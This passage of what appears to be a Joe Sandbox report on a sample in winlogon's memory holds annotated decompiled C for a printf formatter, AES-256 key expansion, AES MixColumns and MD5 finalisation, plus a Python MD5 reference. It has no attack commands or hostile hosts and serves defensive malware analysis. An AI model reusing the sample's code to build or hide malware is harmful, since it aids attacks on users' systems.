    											__eflags = _t262[_t271];
    											if(_t262[_t271] != 0) {
    												goto L78;
    											}
    											_t272 = _t271 + 0xffffffff;
    											__eflags = _t272;
    											 *_t262 = _t272;
    											if(_t272 != 0) {
    												continue;
    											}
    											goto L78;
    										}
    									}
    									L78:
    									return _t331;
    								} else {
    									goto L23;
    								}
    							}
    						} else {
    							_t6 =  &(_t328[1]); // 0xfc23b5a
    							_t295 =  *_t6;
    							_v44 = _t295;
    							__eflags = _t295 - 1;
    							if(_t295 != 1) {
    								__eflags = _t349;
    								if(_t349 != 0) {
    									_t342 = 0;
    									_v12 = 0;
    									_v8 = 0;
    									_v20 = 0;
    									__eflags = _t349 - 0xffffffff;
    									if(_t349 != 0xffffffff) {
    										_t250 = _v16 + 1;
    										__eflags = _t250;
    										_v32 = _t250;
    										_t373 =  &(_t262[_t349 + 1]);
    										do {
    											_t253 = E00D7D6E0( *_t373, _t342, _t295, 0);
    											_v68 = _t303;
    											_t373 = _t373 - 4;
    											_v20 = _t262;
    											_t342 = _t295;
    											_t303 = 0 + _t253;
    											asm("adc ecx, 0x0");
    											_v12 = _t303;
    											_t34 =  &_v32;
    											 *_t34 = _v32 - 1;
    											__eflags =  *_t34;
    											_v8 = _v12;
    											_t295 = _v44;
    										} while ( *_t34 != 0);
    										_t262 = _a4;
    									}
    									_v544 = 0;
    									_t41 =  &(_t262[1]); // 0x4
    									_t370 = _t41;
    									 *_t262 = 0;
    									E00D7AC3A(_t370, 0x1cc,  &_v540, 0);
    									_t247 = _v20;
    									__eflags = 0 - _t247;
    									 *_t370 = _t342;
    									_t262[2] = _t247;
    									asm("sbb ecx, ecx");
    									__eflags =  ~0x00000000;
    									 *_t262 = 0xbadbae;
    									return _v12;
    								} else {
    									_t14 =  &(_t262[1]); // 0x4
    									_t344 = _t14;
    									_v544 = 0;
    									 *_t262 = 0;
    									E00D7AC3A(_t344, 0x1cc,  &_v540, 0);
    									_t256 = _t262[1];
    									_t322 = _t256 % _v44;
    									__eflags = 0 - _t322;
    									 *_t344 = _t322;
    									asm("sbb ecx, ecx");
    									__eflags = 0;
    									 *_t262 =  ~0x00000000;
    									return _t256 / _v44;
    								}
    							} else {
    								_t9 =  &(_t262[1]); // 0x4
    								_v544 = _t198;
    								 *_t262 = _t198;
    								E00D7AC3A(_t9, 0x1cc,  &_v540, _t198);
    								__eflags = 0;
    								return _t262[1];
    							}
    						}
    					} else {
    						__eflags = 0;
    						return 0;
    					}
    				} else {
    					return _t197;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 88%
    			// Note: this routine switches on the conversion character kept at offset 0x31 ('d', 'i', 'n', 'o', 'p', 's', 'x', 'X', 'a', 'A', 'C', 'S', 'Z', 'E'..'G'),
    			// emits the sign/space flag byte and the "0x"/"0X" prefix for the alternate form, then pads and writes the converted field:
    			// this is consistent with the per-specifier output loop of a statically linked C runtime printf (the 'Z' specifier is MSVC-specific).
    			E00D6F6CE(void* __ecx) {
    				char _v6;
    				char _v8;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char _t49;
    				signed int _t50;
    				void* _t51;
    				signed char _t54;
    				signed char _t56;
    				signed int _t57;
    				signed int _t58;
    				signed char _t67;
    				signed char _t69;
    				signed char _t71;
    				signed char _t80;
    				signed char _t82;
    				signed int _t84;
    				signed int _t86;
    				signed int _t87;
    				signed char _t92;
    				void* _t95;
    				intOrPtr _t100;
    				unsigned int _t102;
    				signed char _t104;
    				void* _t112;
    				unsigned int _t113;
    				void* _t114;
    				signed int _t115;
    				signed int* _t116;
    				void* _t119;
    				void* _t121;
    				void* _t122;
    				void* _t124;
    				void* _t125;
    
    				_push(__ecx);
    				_t119 = __ecx;
    				_t92 = 1;
    				_t49 =  *((char*)(__ecx + 0x31));
    				_t124 = _t49 - 0x64;
    				if(_t124 > 0) {
    					__eflags = _t49 - 0x70;
    					if(__eflags > 0) {
    						_t50 = _t49 - 0x73;
    						__eflags = _t50;
    						if(_t50 == 0) {
    							L9:
    							_t51 = E00D6FDC6(_t119);
    							L10:
    							if(_t51 != 0) {
    								__eflags =  *((char*)(_t119 + 0x30));
    								if( *((char*)(_t119 + 0x30)) == 0) {
    									_t113 =  *(_t119 + 0x20);
    									_push(_t114);
    									_v8 = 0;
    									_t115 = 0;
    									_v6 = 0;
    									_t54 = _t113 >> 4;
    									__eflags = _t92 & _t54;
    									if((_t92 & _t54) == 0) {
    										L46:
    										_t100 =  *((intOrPtr*)(_t119 + 0x31));
    										__eflags = _t100 - 0x78;
    										if(_t100 == 0x78) {
    											L48:
    											_t56 = _t113 >> 5;
    											__eflags = _t92 & _t56;
    											if((_t92 & _t56) != 0) {
    												L50:
    												__eflags = _t100 - 0x61;
    												if(_t100 == 0x61) {
    													L53:
    													_t57 = 1;
    													L54:
    													__eflags = _t92;
    													if(_t92 != 0) {
    														L56:
    														 *((char*)(_t121 + _t115 - 4)) = 0x30;
    														__eflags = _t100 - 0x58;
    														if(_t100 == 0x58) {
    															L59:
    															_t58 = 1;
    															L60:
    															__eflags = _t58;
    															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
    															_t115 = _t115 + 2;
    															__eflags = _t115;
    															L61:
    															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
    															__eflags = _t113 & 0x0000000c;
    															if((_t113 & 0x0000000c) == 0) {
    																E00D6F0D7(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
    																_t122 = _t122 + 0x10;
    															}
    															E00D6FF22(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
    															_t102 =  *(_t119 + 0x20);
    															_t116 = _t119 + 0x18;
    															_t67 = _t102 >> 3;
    															__eflags = _t67 & 0x00000001;
    															if((_t67 & 0x00000001) != 0) {
    																_t104 = _t102 >> 2;
    																__eflags = _t104 & 0x00000001;
    																if((_t104 & 0x00000001) == 0) {
    																	E00D6F0D7(_t119 + 0x448, 0x30, _t95, _t116);
    																	_t122 = _t122 + 0x10;
    																}
    															}
    															E00D6FE7B(_t95, _t119, _t116, _t119, 0);
    															__eflags =  *_t116;
    															if( *_t116 >= 0) {
    																_t71 =  *(_t119 + 0x20) >> 2;
    																__eflags = _t71 & 0x00000001;
    																if((_t71 & 0x00000001) != 0) {
    																	E00D6F0D7(_t119 + 0x448, 0x20, _t95, _t116);
    																}
    															}
    															_t69 = 1;
    															L70:
    															return _t69;
    														}
    														__eflags = _t100 - 0x41;
    														if(_t100 == 0x41) {
    															goto L59;
    														}
    														_t58 = 0;
    														goto L60;
    													}
    													__eflags = _t57;
    													if(_t57 == 0) {
    														goto L61;
    													}
    													goto L56;
    												}
    												__eflags = _t100 - 0x41;
    												if(_t100 == 0x41) {
    													goto L53;
    												}
    												_t57 = 0;
    												goto L54;
    											}
    											L49:
    											_t92 = 0;
    											__eflags = 0;
    											goto L50;
    										}
    										__eflags = _t100 - 0x58;
    										if(_t100 != 0x58) {
    											goto L49;
    										}
    										goto L48;
    									}
    									_t80 = _t113 >> 6;
    									__eflags = _t92 & _t80;
    									if((_t92 & _t80) == 0) {
    										__eflags = _t92 & _t113;
    										if((_t92 & _t113) == 0) {
    											_t82 = _t113 >> 1;
    											__eflags = _t92 & _t82;
    											if((_t92 & _t82) == 0) {
    												goto L46;
    											}
    											_v8 = 0x20;
    											L45:
    											_t115 = _t92;
    											goto L46;
    										}
    										_v8 = 0x2b;
    										goto L45;
    									}
    									_v8 = 0x2d;
    									goto L45;
    								}
    								_t69 = _t92;
    								goto L70;
    							}
    							L11:
    							_t69 = 0;
    							goto L70;
    						}
    						_t84 = _t50;
    						__eflags = _t84;
    						if(__eflags == 0) {
    							L28:
    							_push(0);
    							_push(0xa);
    							L29:
    							_t51 = E00D6FBD1(_t119, _t114, __eflags);
    							goto L10;
    						}
    						__eflags = _t84 - 3;
    						if(__eflags != 0) {
    							goto L11;
    						}
    						_push(0);
    						L13:
    						_push(0x10);
    						goto L29;
    					}
    					if(__eflags == 0) {
    						_t51 = E00D6FDAE(__ecx);
    						goto L10;
    					}
    					__eflags = _t49 - 0x67;
    					if(_t49 <= 0x67) {
    						L30:
    						_t51 = E00D6F9E7(_t92, _t119, _t112);
    						goto L10;
    					}
    					__eflags = _t49 - 0x69;
    					if(_t49 == 0x69) {
    						L27:
    						_t2 = _t119 + 0x20;
    						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
    						__eflags =  *_t2;
    						goto L28;
    					}
    					__eflags = _t49 - 0x6e;
    					if(_t49 == 0x6e) {
    						_t51 = E00D6FD1B(__ecx, _t112);
    						goto L10;
    					}
    					__eflags = _t49 - 0x6f;
    					if(_t49 != 0x6f) {
    						goto L11;
    					}
    					_t51 = E00D6FD8F(__ecx);
    					goto L10;
    				}
    				if(_t124 == 0) {
    					goto L27;
    				}
    				_t125 = _t49 - 0x58;
    				if(_t125 > 0) {
    					_t86 = _t49 - 0x5a;
    					__eflags = _t86;
    					if(_t86 == 0) {
    						_t51 = E00D6F984(__ecx);
    						goto L10;
    					}
    					_t87 = _t86 - 7;
    					__eflags = _t87;
    					if(_t87 == 0) {
    						goto L30;
    					}
    					__eflags = _t87;
    					if(__eflags != 0) {
    						goto L11;
    					}
    					L17:
    					_t51 = E00D6FB41(_t92, _t119, __eflags, 0);
    					goto L10;
    				}
    				if(_t125 == 0) {
    					_push(1);
    					goto L13;
    				}
    				if(_t49 == 0x41) {
    					goto L30;
    				}
    				if(_t49 == 0x43) {
    					goto L17;
    				}
    				if(_t49 <= 0x44) {
    					goto L11;
    				}
    				if(_t49 <= 0x47) {
    					goto L30;
    				}
    				if(_t49 != 0x53) {
    					goto L11;
    				}
    				goto L9;
    			}

    Strings
    C-Code - Quality: 34%
    			// Note: the stack constants 0x01000000 .. 0x9a000000 are the AES round constants (Rcon), the 32 key bytes at __ecx are loaded
    			// big-endian into 8 words at __edx, and the loop runs i = 8 .. 59 applying SubWord when i % 8 == 4 and RotWord+SubWord+Rcon when
    			// i % 8 == 0: this matches the FIPS-197 AES-256 key expansion (Nk = 8, 60 round-key words), with the table at 0xd85b68 used as the S-box.
    			E00D68EE0(void* __ebx, signed char* __ecx, signed int* __edx, void* __edi, void* __esi) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				signed int _t86;
    				signed int _t112;
    				signed int _t124;
    				signed int _t126;
    				signed int _t185;
    				signed int _t221;
    				signed int* _t246;
    				signed int _t257;
    				signed int _t260;
    
    				_t86 =  *0xd88004; // 0x276b9783
    				_v8 = _t86 ^ _t257;
    				_v68 = 0x1000000;
    				_t246 = __edx;
    				_v64 = 0x2000000;
    				_v60 = 0x4000000;
    				_v56 = 0x8000000;
    				_v52 = 0x10000000;
    				_v48 = 0x20000000;
    				 *__edx = ((( *__ecx & 0x000000ff) << 0x00000008 | __ecx[1] & 0x000000ff) << 0x00000008 | __ecx[2] & 0x000000ff) << 0x00000008 | __ecx[3] & 0x000000ff;
    				_v44 = 0x40000000;
    				_v40 = 0x80000000;
    				_v36 = 0x1b000000;
    				__edx[1] = (((__ecx[4] & 0x000000ff) << 0x00000008 | __ecx[5] & 0x000000ff) << 0x00000008 | __ecx[6] & 0x000000ff) << 0x00000008 | __ecx[7] & 0x000000ff;
    				_v32 = 0x36000000;
    				_v28 = 0x6c000000;
    				_v24 = 0xd8000000;
    				__edx[2] = (((__ecx[8] & 0x000000ff) << 0x00000008 | __ecx[9] & 0x000000ff) << 0x00000008 | __ecx[0xa] & 0x000000ff) << 0x00000008 | __ecx[0xb] & 0x000000ff;
    				_v20 = 0xab000000;
    				_v16 = 0x4d000000;
    				_v12 = 0x9a000000;
    				__edx[3] = (((__ecx[0xc] & 0x000000ff) << 0x00000008 | __ecx[0xd] & 0x000000ff) << 0x00000008 | __ecx[0xe] & 0x000000ff) << 0x00000008 | __ecx[0xf] & 0x000000ff;
    				__edx[4] = (((__ecx[0x10] & 0x000000ff) << 0x00000008 | __ecx[0x11] & 0x000000ff) << 0x00000008 | __ecx[0x12] & 0x000000ff) << 0x00000008 | __ecx[0x13] & 0x000000ff;
    				_t126 = 8;
    				__edx[5] = (((__ecx[0x14] & 0x000000ff) << 0x00000008 | __ecx[0x15] & 0x000000ff) << 0x00000008 | __ecx[0x16] & 0x000000ff) << 0x00000008 | __ecx[0x17] & 0x000000ff;
    				__edx[6] = (((__ecx[0x18] & 0x000000ff) << 0x00000008 | __ecx[0x19] & 0x000000ff) << 0x00000008 | __ecx[0x1a] & 0x000000ff) << 0x00000008 | __ecx[0x1b] & 0x000000ff;
    				__edx[7] = (((__ecx[0x1c] & 0x000000ff) << 0x00000008 | __ecx[0x1d] & 0x000000ff) << 0x00000008 | __ecx[0x1e] & 0x000000ff) << 0x00000008 | __ecx[0x1f] & 0x000000ff;
    				do {
    					_t112 = _t246[7];
    					_t185 = _t126 & 0x80000007;
    					if(_t185 < 0) {
    						_t185 = (_t185 - 0x00000001 | 0xfffffff8) + 1;
    						_t260 = _t185;
    					}
    					if(_t260 != 0) {
    						if(_t185 == 4) {
    							_t112 = ( *((_t112 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x00000004 & 0x0000000f) + (_t112 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff) + (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x1c) + (_t112 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t112 >> 0x00000010 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x00000014 & 0x0000000f) + (_t112 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t112 >> 0x00000008 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x0000000c & 0x0000000f) + (_t112 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8);
    						}
    					} else {
    						asm("rol eax, 0x8");
    						_t124 = (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x1c) + (_t112 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t112 >> 0x00000010 & 0x0000000f) + 0xd85b68 + ((_t249 >> 0x00000014 & 0x0000000f) + (_t249 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t249 >> 0x00000008 & 0x0000000f) + 0xd85b68 + ((_t249 >> 0x0000000c & 0x0000000f) + (_t249 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t249 & 0x0000000f) + 0xd85b68 + ((_t249 >> 0x00000004 & 0x0000000f) + (_t249 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff);
    						_t68 = _t126 - 1; // 0x7
    						_t221 = _t68;
    						if(_t221 < 0) {
    							_t221 = _t221 + 7;
    						}
    						_t112 = _t124 ^  *(_t257 + (_t221 >> 3) * 4 - 0x40);
    					}
    					_t126 = _t126 + 1;
    					_t246[8] =  *_t246 ^ _t112;
    					_t246 =  &(_t246[1]);
    				} while (_t126 < 0x3c);
    				return E00D6ABE4(_v8 ^ _t257);
    			}

    C-Code - Quality: 100%
    			// Note: each output byte is the XOR of four entries of a lookup table at 0xd8556a (6 bytes per input value, indexed by 6 * byte)
    			// taken across the four bytes of one 16-byte state column, with the entry pattern rotating by one position per output row:
    			// this is consistent with the AES (Inv)MixColumns step applied in place, using a precomputed GF(2^8) multiplication table.
    			E00D69330(signed char* __ecx) {
    				signed char* _v8;
    				intOrPtr _v12;
    				signed char _t278;
    				signed char* _t279;
    				signed char* _t281;
    				signed char* _t283;
    				signed char* _t285;
    				signed int _t287;
    				signed int _t289;
    				signed int _t291;
    				signed int _t293;
    				intOrPtr _t294;
    				signed int _t296;
    				signed int _t298;
    				signed int _t300;
    				signed int _t301;
    				signed int _t302;
    				signed int _t303;
    				signed int _t304;
    				signed int _t305;
    				signed int _t306;
    				signed int _t307;
    				signed int _t308;
    
    				_v8 = __ecx;
    				_t279 = _v8;
    				_v12 = ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2 + ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2;
    				_t294 = _v12;
    				_t301 = (__ecx[4] & 0x000000ff) + (__ecx[4] & 0x000000ff) * 2;
    				_t305 = (__ecx[8] & 0x000000ff) + (__ecx[8] & 0x000000ff) * 2;
    				_t287 = (__ecx[0xc] & 0x000000ff) + (__ecx[0xc] & 0x000000ff) * 2;
    				 *_t279 =  *(0xd8556a + _t287 * 2) & 0x000000ff ^  *(0xd8556c + _t305 * 2) ^  *(0xd8556b + _t301 * 2) ^  *(_t294 + 0xd8556d);
    				_t279[4] =  *(0xd8556c + _t287 * 2) & 0x000000ff ^  *(0xd8556b + _t305 * 2) ^  *(0xd8556d + _t301 * 2) ^  *(_t294 + 0xd8556a);
    				_t279[8] =  *(0xd8556b + _t287 * 2) & 0x000000ff ^  *(0xd8556d + _t305 * 2) ^  *(0xd8556a + _t301 * 2) ^  *(_t294 + 0xd8556c);
    				_t279[0xc] =  *(0xd8556d + _t287 * 2) & 0x000000ff ^  *(0xd8556a + _t305 * 2) ^  *(0xd8556c + _t301 * 2) ^  *(_t294 + 0xd8556b);
    				_t302 = (_t279[1] & 0x000000ff) + (_t279[1] & 0x000000ff) * 2;
    				_t306 = (_t279[5] & 0x000000ff) + (_t279[5] & 0x000000ff) * 2;
    				_t296 = (_t279[9] & 0x000000ff) + (_t279[9] & 0x000000ff) * 2;
    				_t281 = _v8;
    				_t289 = (_t279[0xd] & 0x000000ff) + (_t279[0xd] & 0x000000ff) * 2;
    				 *(_t281 + 1) =  *(0xd8556a + _t289 * 2) & 0x000000ff ^  *(0xd8556c + _t296 * 2) ^  *(0xd8556b + _t306 * 2) ^  *(0xd8556d + _t302 * 2);
    				 *(_t281 + 5) =  *(0xd8556c + _t289 * 2) & 0x000000ff ^  *(0xd8556b + _t296 * 2) ^  *(0xd8556d + _t306 * 2) ^  *(0xd8556a + _t302 * 2);
    				 *(_t281 + 9) =  *(0xd8556b + _t289 * 2) & 0x000000ff ^  *(0xd8556d + _t296 * 2) ^  *(0xd8556a + _t306 * 2) ^  *(0xd8556c + _t302 * 2);
    				 *(_t281 + 0xd) =  *(0xd8556d + _t289 * 2) & 0x000000ff ^  *(0xd8556a + _t296 * 2) ^  *(0xd8556c + _t306 * 2) ^  *(0xd8556b + _t302 * 2);
    				_t303 = ( *(_t281 + 2) & 0x000000ff) + ( *(_t281 + 2) & 0x000000ff) * 2;
    				_t307 = ( *(_t281 + 6) & 0x000000ff) + ( *(_t281 + 6) & 0x000000ff) * 2;
    				_t298 = ( *(_t281 + 0xa) & 0x000000ff) + ( *(_t281 + 0xa) & 0x000000ff) * 2;
    				_t291 = ( *(_t281 + 0xe) & 0x000000ff) + ( *(_t281 + 0xe) & 0x000000ff) * 2;
    				_t283 = _v8;
    				 *(_t283 + 2) =  *(0xd8556a + _t291 * 2) & 0x000000ff ^  *(0xd8556c + _t298 * 2) ^  *(0xd8556b + _t307 * 2) ^  *(0xd8556d + _t303 * 2);
    				 *(_t283 + 6) =  *(0xd8556c + _t291 * 2) & 0x000000ff ^  *(0xd8556b + _t298 * 2) ^  *(0xd8556d + _t307 * 2) ^  *(0xd8556a + _t303 * 2);
    				 *(_t283 + 0xa) =  *(0xd8556b + _t291 * 2) & 0x000000ff ^  *(0xd8556d + _t298 * 2) ^  *(0xd8556a + _t307 * 2) ^  *(0xd8556c + _t303 * 2);
    				 *(_t283 + 0xe) =  *(0xd8556d + _t291 * 2) & 0x000000ff ^  *(0xd8556a + _t298 * 2) ^  *(0xd8556c + _t307 * 2) ^  *(0xd8556b + _t303 * 2);
    				_t304 = ( *(_t283 + 3) & 0x000000ff) + ( *(_t283 + 3) & 0x000000ff) * 2;
    				_t308 = ( *(_t283 + 7) & 0x000000ff) + ( *(_t283 + 7) & 0x000000ff) * 2;
    				_t300 = ( *(_t283 + 0xb) & 0x000000ff) + ( *(_t283 + 0xb) & 0x000000ff) * 2;
    				_t285 = _v8;
    				_t293 = ( *(_t283 + 0xf) & 0x000000ff) + ( *(_t283 + 0xf) & 0x000000ff) * 2;
    				_t285[3] =  *(0xd8556a + _t293 * 2) & 0x000000ff ^  *(0xd8556c + _t300 * 2) ^  *(0xd8556b + _t308 * 2) ^  *(0xd8556d + _t304 * 2);
    				_t285[7] =  *(0xd8556c + _t293 * 2) & 0x000000ff ^  *(0xd8556b + _t300 * 2) ^  *(0xd8556d + _t308 * 2) ^  *(0xd8556a + _t304 * 2);
    				_t285[0xb] =  *(0xd8556b + _t293 * 2) & 0x000000ff ^  *(0xd8556d + _t300 * 2) ^  *(0xd8556a + _t308 * 2) ^  *(0xd8556c + _t304 * 2);
    				_t278 =  *(0xd8556d + _t293 * 2) & 0x000000ff ^  *(0xd8556a + _t300 * 2) ^  *(0xd8556c + _t308 * 2) ^  *(0xd8556b + _t304 * 2);
    				_t285[0xf] = _t278;
    				return _t278;
    			}

    C-Code - Quality: 97%
    			// Note: writes the 0x80 terminator at the current buffer length (offset 0x40), zero-pads to offset 0x38 (running an extra block
    			// transform if the length is >= 56), stores the 64-bit message bit count little-endian at offsets 0x38..0x3f, runs the block
    			// transform E00D61110 and copies the state words out to __edx: the finalization of a 64-byte-block hash with little-endian
    			// length encoding (MD5-style). The memset(..., 0x40 << 2) / memset(..., 0 << 0) pairs appear to be the decompiler's rendering
    			// of rep stos sequences and do not reflect the real byte counts.
    			E00D61870(void* __ecx, char* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t77;
    				unsigned int _t123;
    				int _t125;
    				int _t128;
    				char* _t130;
    				void* _t157;
    				void* _t164;
    				void* _t165;
    				void* _t166;
    				void* _t167;
    				void* _t168;
    				void* _t169;
    				void* _t170;
    
    				_t169 = __ecx;
    				_t130 = __edx;
    				_t77 =  *((intOrPtr*)(__ecx + 0x40));
    				 *((char*)(_t77 + __ecx)) = 0x80;
    				_t157 = _t77 + 1;
    				if(_t77 >= 0x38) {
    					if(_t157 < 0x40) {
    						_t165 = _t157 + __ecx;
    						_t125 = memset(_t165, 0, 0x40 << 2);
    						_t166 = _t165 + (0x40 - _t157 >> 2);
    						memset(_t166, _t125, 0 << 0);
    						_t170 = _t170 + 0x18;
    						_t164 = _t166;
    					}
    					E00D61110(_t130, _t169, _t169, _t164, _t169);
    					E00D6D520(_t164, _t169, 0, 0x38);
    				} else {
    					if(_t157 < 0x38) {
    						_t167 = _t157 + __ecx;
    						_t128 = memset(_t167, 0, 0x38 << 2);
    						_t168 = _t167 + (0x38 - _t157 >> 2);
    						memset(_t168, _t128, 0 << 0);
    						_t164 = _t168;
    					}
    				}
    				 *(_t169 + 0x48) =  *(_t169 + 0x48) + ( *(_t169 + 0x40) << 3);
    				asm("adc dword [esi+0x4c], 0x0");
    				 *((char*)(_t169 + 0x38)) =  *(_t169 + 0x48) & 0x000000ff;
    				 *((char*)(_t169 + 0x39)) = ( *(_t169 + 0x4c) << 0x00000020 |  *(_t169 + 0x48)) >> 8;
    				 *((char*)(_t169 + 0x3a)) = ( *(_t169 + 0x4c) << 0x00000020 |  *(_t169 + 0x48)) >> 0x10;
    				 *((char*)(_t169 + 0x3b)) = ( *(_t169 + 0x4c) << 0x00000020 |  *(_t169 + 0x48)) >> 0x18;
    				 *((char*)(_t169 + 0x3c)) = E00D7D930( *(_t169 + 0x48), 0x20,  *(_t169 + 0x4c));
    				 *((char*)(_t169 + 0x3d)) = E00D7D930( *(_t169 + 0x48), 0x28,  *(_t169 + 0x4c));
    				 *((char*)(_t169 + 0x3e)) =  *(_t169 + 0x4e) & 0x000000ff;
    				 *((char*)(_t169 + 0x3f)) =  *(_t169 + 0x4f) & 0x000000ff;
    				E00D61110(_t130, _t169, _t169, _t164, _t169);
    				 *_t130 =  *(_t169 + 0x50);
    				 *((char*)(_t130 + 4)) =  *(_t169 + 0x54);
    				 *((char*)(_t130 + 8)) =  *(_t169 + 0x58);
    				 *((char*)(_t130 + 0xc)) =  *(_t169 + 0x5c);
    				 *((char*)(_t130 + 1)) =  *(_t169 + 0x50) >> 8;
    				 *((char*)(_t130 + 5)) =  *(_t169 + 0x54) >> 8;
    				 *((char*)(_t130 + 9)) =  *(_t169 + 0x58) >> 8;
    				 *((char*)(_t130 + 0xd)) =  *(_t169 + 0x5c) >> 8;
    				 *((char*)(_t130 + 2)) =  *(_t169 + 0x50) >> 0x10;
    				 *((char*)(_t130 + 6)) =  *(_t169 + 0x54) >> 0x10;
    				 *((char*)(_t130 + 0xa)) =  *(_t169 + 0x58) >> 0x10;
    				 *((char*)(_t130 + 0xe)) =  *(_t169 + 0x5c) >> 0x10;
    				 *((char*)(_t130 + 3)) =  *(_t169 + 0x50) >> 0x18;
    				 *((char*)(_t130 + 7)) =  *(_t169 + 0x54) >> 0x18;
    				 *((char*)(_t130 + 0xb)) =  *(_t169 + 0x58) >> 0x18;
    				_t123 =  *(_t169 + 0x5c) >> 0x18;
    				 *(_t130 + 0xf) = _t123;
    				return _t123;
    			}
    Address column (one entry per C-code line above, 0x00000000 where a line has no mapped instruction): 0x00d61872 to 0x00d619dd

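    E00D61870 above has the shape of the finalisation step of an MD4/MD5-style hash: it writes 0x80 at the current buffer offset (ctx+0x40 holds the buffered byte count), zero-pads to 56 bytes (first running the compression function E00D61110 on a full 64-byte block when fewer than 8 bytes remain), adds the buffered bits into the 64-bit bit counter at ctx+0x48/0x4c (the add plus adc), stores that counter little-endian in bytes 0x38..0x3f (E00D7D930 is the 64-bit right-shift helper that yields bytes 4 and 5), compresses once more and writes the four 32-bit state words at ctx+0x50..0x5c out little-endian as a 16-byte digest. The Python below is an added reference implementation written for this report, not code from the sample; the comments mark the steps that correspond to the listing. It assumes E00D61110 is the compression function. MD4 and MD5 share this finalisation and the listing does not show the compression body, so the match is a layout check, not an identification of which of the two the sample uses.

```python
import hashlib
import math
import struct

# MD5 per-round shift amounts and the sine-derived constants (RFC 1321).
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
_INIT = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]


def _rotl(x, c):
    return ((x << c) | (x >> (32 - c))) & 0xFFFFFFFF


def md5_compress(state, block):
    """One 64-byte block into the four-word state (the role E00D61110 plays)."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & 0xFFFFFFFF
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & 0xFFFFFFFF
    return [(x + y) & 0xFFFFFFFF for x, y in zip(state, (a, b, c, d))]


def md5_final(state, buffered, bit_count):
    """Same layout as E00D61870: 'buffered' is the partial block at ctx+0,
    len(buffered) is ctx+0x40, bit_count is ctx+0x48/0x4c, state is ctx+0x50.."""
    bit_count = (bit_count + len(buffered) * 8) & 0xFFFFFFFFFFFFFFFF  # add/adc at +0x48/+0x4c
    buf = buffered + b"\x80"                                          # 0x80 at ctx + buflen
    if len(buffered) >= 0x38:                                         # no room for the length
        buf += b"\x00" * (0x40 - len(buf))
        state = md5_compress(state, buf)                              # extra compression
        buf = b""                                                     # memset(ctx, 0, 0x38)
    buf += b"\x00" * (0x38 - len(buf))
    buf += struct.pack("<Q", bit_count)                               # bytes 0x38..0x3f, LE
    state = md5_compress(state, buf)
    return struct.pack("<4I", *state)                                 # words at +0x50.. dumped LE


def md5(data):
    state = list(_INIT)
    full = len(data) - len(data) % 64
    bits = 0
    for off in range(0, full, 64):
        state = md5_compress(state, data[off:off + 64])
        bits += 512
    return md5_final(state, data[full:], bits)


def matches_hashlib(data):
    """Cross-check against the standard library; True for every input if the
    padding/length/output layout above is the standard one."""
    return md5(data) == hashlib.md5(data).digest()
```

    Inputs of 55, 56 and 64 bytes exercise both padding branches (room for the length in the current block versus an extra compression first), which is the part of the listing most worth comparing against a known-good implementation.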
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
